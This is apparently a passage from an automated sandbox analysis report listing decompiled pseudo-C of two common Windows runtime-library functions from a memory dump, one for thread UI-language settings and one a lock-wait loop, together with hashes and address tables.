                                                      • Opcode Fuzzy Hash: 35e4c4746c257a06f9646bca733563df789d8917a690452e030e2ea8e8b2bde3
                                                      • Instruction Fuzzy Hash: C4C19D75E00219EFDB24DF98D880ABDBBB5FF89755F044479E901AB250E734B941CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E0493FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0491EEF0(0x49f7b60);
					_t134 =  *0x49f7b84; // 0x773b7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x49f7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x49f7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04916D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E049176E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E049A8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0490B150();
													}
													_t116 = E049A6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E049175CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x49f8638; // 0xc70158
																	_t122 = L049138A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E049176E2(_t154);
																			goto L41;
																		}
																	} else {
																		E049176E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0493FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L049170F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0493FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0493FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0493FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0493FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0493FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x49f7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x49f7b84 = _t75;
						_t73 = E0491EB70(_t134, 0x49f7b60);
						if( *0x49f7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0491FF60( *0x49f7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                      0x0493fab0
                                                      0x0493fab2
                                                      0x0493fab3
                                                      0x0493fab4
                                                      0x0493fabc
                                                      0x0493fac0
                                                      0x0493fb14
                                                      0x0493fb17
                                                      0x0493fac2
                                                      0x0493fac8
                                                      0x0493facd
                                                      0x0493fad3
                                                      0x0493fad3
                                                      0x0493fadd
                                                      0x0493fb18
                                                      0x0493fb1b
                                                      0x0493fb1d
                                                      0x0493fb1e
                                                      0x0493fb1f
                                                      0x0493fb20
                                                      0x0493fb21
                                                      0x0493fb22
                                                      0x0493fb23
                                                      0x0493fb24
                                                      0x0493fb25
                                                      0x0493fb26
                                                      0x0493fb27
                                                      0x0493fb28
                                                      0x0493fb29
                                                      0x0493fb2a
                                                      0x0493fb2b
                                                      0x0493fb2c
                                                      0x0493fb2d
                                                      0x0493fb2e
                                                      0x0493fb2f
                                                      0x0493fb3a
                                                      0x0493fb3b
                                                      0x0493fb3e
                                                      0x0493fb41
                                                      0x0493fb44
                                                      0x0493fb47
                                                      0x0493fb4a
                                                      0x0493fb4d
                                                      0x0493fb53
                                                      0x0497bdcb
                                                      0x0497bdcb
                                                      0x0493fb59
                                                      0x0493fb5b
                                                      0x0493fb5b
                                                      0x0493fb5e
                                                      0x0497bdd5
                                                      0x0497bdd8
                                                      0x00000000
                                                      0x0497bdda
                                                      0x00000000
                                                      0x0497bdda
                                                      0x0493fb64
                                                      0x0493fb64
                                                      0x0493fb64
                                                      0x0493fb67
                                                      0x0493fb6e
                                                      0x0493fb70
                                                      0x0493fb72
                                                      0x00000000
                                                      0x0493fb78
                                                      0x0493fb7a
                                                      0x0493fb7a
                                                      0x0493fb7d
                                                      0x0493fb80
                                                      0x0497bddf
                                                      0x0497bde1
                                                      0x00000000
                                                      0x0497bde3
                                                      0x00000000
                                                      0x0497bde3
                                                      0x0493fb86
                                                      0x0493fb86
                                                      0x0493fb86
                                                      0x0493fb8b
                                                      0x0493fb90
                                                      0x0493fb92
                                                      0x0493fb94
                                                      0x0493fb9a
                                                      0x0493fb9b
                                                      0x0493fba1
                                                      0x0497bde8
                                                      0x0497bdeb
                                                      0x0497bded
                                                      0x0497beb5
                                                      0x0497beb5
                                                      0x0497bebb
                                                      0x0497bebd
                                                      0x0497bec3
                                                      0x0497bed2
                                                      0x0497bedd
                                                      0x0497bedd
                                                      0x0497beed
                                                      0x00000000
                                                      0x0497bdf3
                                                      0x0497bdfe
                                                      0x0497be06
                                                      0x0497be0b
                                                      0x0497be0d
                                                      0x0497be0f
                                                      0x0497be14
                                                      0x0497be19
                                                      0x0497be20
                                                      0x0497be25
                                                      0x0497be27
                                                      0x0497be35
                                                      0x0497be39
                                                      0x0497be46
                                                      0x0497be4f
                                                      0x0497be54
                                                      0x0497be56
                                                      0x0497bef8
                                                      0x0497bef8
                                                      0x00000000
                                                      0x0497be5c
                                                      0x0497be5c
                                                      0x0497be60
                                                      0x00000000
                                                      0x0497be66
                                                      0x0497be66
                                                      0x0497be7f
                                                      0x0497be84
                                                      0x0497be87
                                                      0x0497be89
                                                      0x0497be8b
                                                      0x0497be99
                                                      0x0497be9d
                                                      0x0497bea0
                                                      0x0497beac
                                                      0x0497beaf
                                                      0x0497beb1
                                                      0x0497beb3
                                                      0x0497beb3
                                                      0x00000000
                                                      0x0497bea2
                                                      0x0497bea2
                                                      0x00000000
                                                      0x0497bea2
                                                      0x0497be8d
                                                      0x0497be8d
                                                      0x0497be92
                                                      0x00000000
                                                      0x0497be92
                                                      0x0497be8b
                                                      0x0497be60
                                                      0x0497be3b
                                                      0x0497be3b
                                                      0x0497be3e
                                                      0x00000000
                                                      0x0497be40
                                                      0x0497be40
                                                      0x0497be44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0497be44
                                                      0x0497be3e
                                                      0x0497be29
                                                      0x0497be29
                                                      0x00000000
                                                      0x0497be29
                                                      0x0497be27
                                                      0x00000000
                                                      0x0493fba7
                                                      0x0493fba7
                                                      0x0493fbab
                                                      0x0497bf02
                                                      0x0493fbb1
                                                      0x0493fbb1
                                                      0x0493fbb8
                                                      0x0493fbbd
                                                      0x0493fbbd
                                                      0x0493fbbf
                                                      0x0493fbbf
                                                      0x0493fbc5
                                                      0x0493fbcb
                                                      0x0493fbf8
                                                      0x0493fbf8
                                                      0x0493fbfa
                                                      0x00000000
                                                      0x0493fc00
                                                      0x0493fc00
                                                      0x0493fc03
                                                      0x00000000
                                                      0x0493fc09
                                                      0x0493fc09
                                                      0x0493fc0f
                                                      0x0493fc15
                                                      0x0493fc23
                                                      0x0493fc23
                                                      0x0493fc25
                                                      0x0493fc27
                                                      0x0493fc75
                                                      0x0493fc7c
                                                      0x0493fc84
                                                      0x00000000
                                                      0x0493fc29
                                                      0x0493fc29
                                                      0x0493fc2d
                                                      0x0493fc30
                                                      0x0497bf0f
                                                      0x00000000
                                                      0x0493fc36
                                                      0x0493fc38
                                                      0x0493fc3b
                                                      0x0493fc41
                                                      0x0497bf17
                                                      0x0497bf19
                                                      0x0497bf48
                                                      0x0497bf4b
                                                      0x00000000
                                                      0x0497bf1b
                                                      0x0497bf22
                                                      0x0497bf24
                                                      0x0497bf26
                                                      0x00000000
                                                      0x0497bf2c
                                                      0x0497bf37
                                                      0x0497bf39
                                                      0x0497bf3b
                                                      0x00000000
                                                      0x0497bf41
                                                      0x0497bf41
                                                      0x0497bf41
                                                      0x0497bf41
                                                      0x0497bf45
                                                      0x00000000
                                                      0x0497bf45
                                                      0x0497bf3b
                                                      0x0497bf26
                                                      0x00000000
                                                      0x0493fc47
                                                      0x0493fc47
                                                      0x0493fc49
                                                      0x0493fcb2
                                                      0x0493fcb4
                                                      0x0493fcb6
                                                      0x0493fcdc
                                                      0x0493fcdc
                                                      0x00000000
                                                      0x0493fcb8
                                                      0x0493fcc3
                                                      0x0493fcc5
                                                      0x0493fcc7
                                                      0x00000000
                                                      0x0493fcc9
                                                      0x0493fcc9
                                                      0x0493fccd
                                                      0x00000000
                                                      0x0493fccd
                                                      0x0493fcc7
                                                      0x00000000
                                                      0x0493fc4b
                                                      0x0493fc4b
                                                      0x0493fc4e
                                                      0x0493fc4e
                                                      0x0493fc51
                                                      0x0493fc51
                                                      0x0493fc54
                                                      0x0493fc5a
                                                      0x0493fc5c
                                                      0x0493fc5f
                                                      0x0493fc61
                                                      0x0493fc63
                                                      0x0493fc65
                                                      0x0493fc67
                                                      0x0493fc6e
                                                      0x0493fc72
                                                      0x0493fc72
                                                      0x0493fc72
                                                      0x0493fc72
                                                      0x0493fc67
                                                      0x0493fc61
                                                      0x00000000
                                                      0x0493fc5a
                                                      0x0493fc49
                                                      0x0493fc41
                                                      0x0493fc30
                                                      0x0493fc27
                                                      0x0493fc03
                                                      0x0493fbcd
                                                      0x0493fbd3
                                                      0x0493fbd9
                                                      0x0493fbdc
                                                      0x0493fbde
                                                      0x0493fc99
                                                      0x0493fc9b
                                                      0x0493fc9d
                                                      0x0493fcd5
                                                      0x0493fcd5
                                                      0x0493fc89
                                                      0x0493fc89
                                                      0x00000000
                                                      0x0493fc9f
                                                      0x0493fc9f
                                                      0x0493fca3
                                                      0x00000000
                                                      0x0493fca3
                                                      0x00000000
                                                      0x0493fbe4
                                                      0x0493fbe4
                                                      0x0493fbe4
                                                      0x0493fbe4
                                                      0x0493fbe9
                                                      0x0493fbf2
                                                      0x00000000
                                                      0x0493fbf2
                                                      0x0493fbde
                                                      0x0493fbcb
                                                      0x0493fbab
                                                      0x0493fc8b
                                                      0x0493fc8b
                                                      0x0493fc8c
                                                      0x0493fb80
                                                      0x0493fb72
                                                      0x0493fb5e
                                                      0x0493fc8d
                                                      0x0493fc91
                                                      0x0493fadf
                                                      0x0493fadf
                                                      0x0493fae1
                                                      0x0493fae4
                                                      0x0493fae7
                                                      0x0493faec
                                                      0x0493faf8
                                                      0x0493fb00
                                                      0x0493fb07
                                                      0x0493fb0f
                                                      0x0493fb0f
                                                      0x0493fb07
                                                      0x00000000
                                                      0x0493faf8
                                                      0x0493fadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0497BE0F
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-865735534
                                                      • Opcode ID: 5e5885a6c939fcc94f07b5cdfa6c16ac848906653b9d5658e5da5016b8837de6
                                                      • Instruction ID: 8db51b1a67d31c690ea2b144211460c49a52d9048bc1e9d12023a14b12536245
                                                      • Opcode Fuzzy Hash: 5e5885a6c939fcc94f07b5cdfa6c16ac848906653b9d5658e5da5016b8837de6
                                                      • Instruction Fuzzy Hash: B3A1E371F006068FEB25DF64C454B6AB3B9AF46B19F0445B9E906DB794EB34F8018B80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04902D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E04902D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x49f5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x49f7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E049497C0();
				}
				if( *0x49f79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x49f79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04931624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04927D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0499FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04949520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0493E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0495DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x49f6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x49f6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04949980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E049495D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04927D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04927D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04987016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0499FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x49f5350;
							if(_t109 != 0x49f5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0499FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04995720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                      0x04902d8a
                                                      0x04902d8a
                                                      0x04902d92
                                                      0x04902d96
                                                      0x04902d9e
                                                      0x04902da0
                                                      0x04902da3
                                                      0x04902da5
                                                      0x04902da8
                                                      0x04902dab
                                                      0x04902db2
                                                      0x0495f9aa
                                                      0x0495f9ab
                                                      0x0495f9ae
                                                      0x0495f9ae
                                                      0x04902db8
                                                      0x04902dc2
                                                      0x0495f9b9
                                                      0x0495f9be
                                                      0x0495f9bf
                                                      0x0495f9bf
                                                      0x04902dcf
                                                      0x0495f9c9
                                                      0x04902dd5
                                                      0x04902dd5
                                                      0x04902dd5
                                                      0x04902dde
                                                      0x04902de1
                                                      0x04902e70
                                                      0x04902e72
                                                      0x04902e72
                                                      0x04902de7
                                                      0x04902deb
                                                      0x04902e7c
                                                      0x04902e83
                                                      0x04902e85
                                                      0x04902e8b
                                                      0x04902e8d
                                                      0x04902e92
                                                      0x04902e92
                                                      0x04902e85
                                                      0x04902df1
                                                      0x04902df7
                                                      0x04902df9
                                                      0x04902df9
                                                      0x04902dfc
                                                      0x04902dff
                                                      0x04902e02
                                                      0x00000000
                                                      0x04902e05
                                                      0x04902e0c
                                                      0x0495f9d9
                                                      0x04902e12
                                                      0x04902e12
                                                      0x04902e12
                                                      0x04902e1a
                                                      0x0495f9e3
                                                      0x0495f9e9
                                                      0x0495f9f0
                                                      0x0495f9f6
                                                      0x0495f9f8
                                                      0x0495f9f8
                                                      0x0495f9f0
                                                      0x04902e23
                                                      0x0495fa02
                                                      0x0495fa03
                                                      0x0495fa05
                                                      0x0495fa06
                                                      0x00000000
                                                      0x04902e29
                                                      0x04902e29
                                                      0x04902e2e
                                                      0x04902e34
                                                      0x04902e3e
                                                      0x00000000
                                                      0x00000000
                                                      0x04902e44
                                                      0x04902e47
                                                      0x04902e4d
                                                      0x00000000
                                                      0x00000000
                                                      0x04902e4f
                                                      0x04902e54
                                                      0x00000000
                                                      0x00000000
                                                      0x04902e5a
                                                      0x04902e5f
                                                      0x04902e9a
                                                      0x04902ea4
                                                      0x04902ea5
                                                      0x04902ea8
                                                      0x04902eaf
                                                      0x04902eb2
                                                      0x04902eb5
                                                      0x0495fae9
                                                      0x0495faeb
                                                      0x0495faed
                                                      0x0495faef
                                                      0x0495faf7
                                                      0x0495faf8
                                                      0x0495fafd
                                                      0x0495faff
                                                      0x0495fb04
                                                      0x0495fb04
                                                      0x0495faff
                                                      0x04902ec0
                                                      0x04902ec4
                                                      0x04902ec6
                                                      0x04902ec8
                                                      0x0495fb14
                                                      0x0495fb18
                                                      0x0495fb1e
                                                      0x0495fb21
                                                      0x0495fb21
                                                      0x04902ece
                                                      0x04902ece
                                                      0x04902ece
                                                      0x04902ed7
                                                      0x04902e61
                                                      0x04902e63
                                                      0x0495fa6b
                                                      0x0495fa71
                                                      0x0495fa76
                                                      0x0495fa78
                                                      0x0495fa8a
                                                      0x0495fa7a
                                                      0x0495fa83
                                                      0x0495fa83
                                                      0x0495fa8f
                                                      0x0495fa91
                                                      0x0495fa97
                                                      0x0495fa9d
                                                      0x0495faa4
                                                      0x0495faaa
                                                      0x0495faaf
                                                      0x0495fab1
                                                      0x0495fac3
                                                      0x0495fab3
                                                      0x0495fabc
                                                      0x0495fabc
                                                      0x0495fac8
                                                      0x0495facb
                                                      0x0495fadf
                                                      0x0495fadf
                                                      0x0495facb
                                                      0x0495faa4
                                                      0x0495fa91
                                                      0x04902e6f
                                                      0x04902e6f
                                                      0x04902e5f
                                                      0x0495fa13
                                                      0x0495fa15
                                                      0x0495fa17
                                                      0x0495fa1f
                                                      0x0495fa21
                                                      0x0495fa22
                                                      0x0495fa25
                                                      0x0495fa28
                                                      0x0495fa2f
                                                      0x0495fa2f
                                                      0x0495fa2a
                                                      0x0495fa2a
                                                      0x0495fa2a
                                                      0x0495fa31
                                                      0x0495fa34
                                                      0x0495fa36
                                                      0x0495fa3c
                                                      0x0495fa3e
                                                      0x0495fa41
                                                      0x0495fa43
                                                      0x0495fa45
                                                      0x0495fa45
                                                      0x0495fa41
                                                      0x0495fa3c
                                                      0x0495fa4a
                                                      0x0495fa4f
                                                      0x0495fa51
                                                      0x0495fa53
                                                      0x0495fa56
                                                      0x0495fa5b
                                                      0x0495fa5e
                                                      0x00000000
                                                      0x0495fa5e
                                                      0x04902e23

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: d99704e67f417efd58142b17c27df17e266759a082c5679ebf4941d5f154a8c7
                                                      • Instruction ID: f9d2a4fc180888c65deb8310eaf62b1f0bfedfb26f91ca7ff36e2e0cf8f9511d
                                                      • Opcode Fuzzy Hash: d99704e67f417efd58142b17c27df17e266759a082c5679ebf4941d5f154a8c7
                                                      • Instruction Fuzzy Hash: A4612531A40604AFEB21DF68C848B7EB7E9EB84728F2446B9D811972D5E734BD41C792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
